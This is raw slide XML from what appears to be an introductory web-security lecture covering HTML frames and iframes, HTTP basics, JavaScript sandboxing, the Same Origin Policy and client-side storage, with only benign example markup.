        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206547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Security is it Anyways?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12550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3571" y="1172516"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"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6" name="Picture 5"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63" y="2989944"/>
            <a:ext cx="810980" cy="720420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1623189" y="2130939"/>
            <a:ext cx="3869198" cy="93391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23189" y="2491615"/>
            <a:ext cx="3725952" cy="89212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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809629" y="1539862"/>
            <a:ext cx="564145" cy="821040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707333" y="1798331"/>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07333" y="2130938"/>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5333571" y="3952387"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809629" y="4319733"/>
            <a:ext cx="564145" cy="821040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707333" y="4578202"/>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7333" y="4910809"/>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7809630" y="5293173"/>
            <a:ext cx="564145" cy="821040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707333" y="5140773"/>
            <a:ext cx="1102297" cy="56292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601711" y="5400115"/>
            <a:ext cx="1207919" cy="5162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40461" y="2265229"/>
            <a:ext cx="1419684" cy="16871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581338" y="2360902"/>
            <a:ext cx="1377553" cy="1722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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="96028" y="80150"/>
            <a:ext cx="1817428" cy="1817428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572086" y="447496"/>
            <a:ext cx="564145" cy="821040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1469790" y="705965"/>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469790" y="1038572"/>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04610" y="1897579"/>
            <a:ext cx="0" cy="116727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08063" y="1884901"/>
            <a:ext cx="0" cy="117995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33" name="Picture 32"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27" y="3064855"/>
            <a:ext cx="810980" cy="720420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356930" y="2947599"/>
            <a:ext cx="1362113" cy="83767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ectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436861" y="1172516"/>
            <a:ext cx="1362113" cy="1817428"/>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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7789227" y="1432798"/>
            <a:ext cx="613630" cy="1039427"/>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0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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ability to tie multiple separate URLs together on one page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in the early days to provide a banner or navigation element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4715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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>frameset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;frameset cols="85%, 15%"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="frame1.html" name="frame_1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="frame2.html" name="frame_2"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>noframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    Text to be displayed in browsers that do not support frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>noframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/frameset&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10142075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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>frame1.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I am frame 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>frame2.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I am frame two</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120823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endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4" descr="first_www_browser_91.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-16840" r="-16840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-774700" y="231532"/>
            <a:ext cx="10617200" cy="5838758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="314541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HTTP – Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Opens TCP connection to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Sends request to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Listens for incoming TCP connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Reads request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Sends response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35764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5 at 1.0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8033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1778248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iframes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inline frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to frames, but does not need a frameset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="frame1.html" name="frame_1" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>frameBorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="0"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="frame2.html" name="frame_2" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>frameBorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="0"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15519295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05 at 1.09.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18033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209080193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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers are downloading and running foreign (JavaScript) code, sometimes concurrently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The security of JavaScript code execution is guaranteed by a sandboxing mechanism (similar to what we saw in Java applets)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No access to local files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No access to (most) network resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No incredibly small windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No access to the browser's history</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The details of the sandbox depend on the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83312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Same Origin Policy (SOP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standard security policy for JavaScript across browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incredibly important to web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you learn only one thing from this class, let it be the Same Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every frame or tab in a browser's window is associated with a domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A domain is determined by the tuple: &lt;protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>port&gt; from which the frame content was downloaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code downloaded in a frame can only access the resources associated with that domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a frame explicitly includes external code, this code will execute within the SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adamdoupe.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the following JavaScript code has access to the &lt;http, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adamdoupe.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 80&gt; SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ajax.googleapis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/libs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/1.11.2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jquery.min.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6821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Storing Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we've seen, information can be stored on the client's browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plugin (Applets, Flash, Silverlight)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LocalStorage</a:t>
            </a:r>
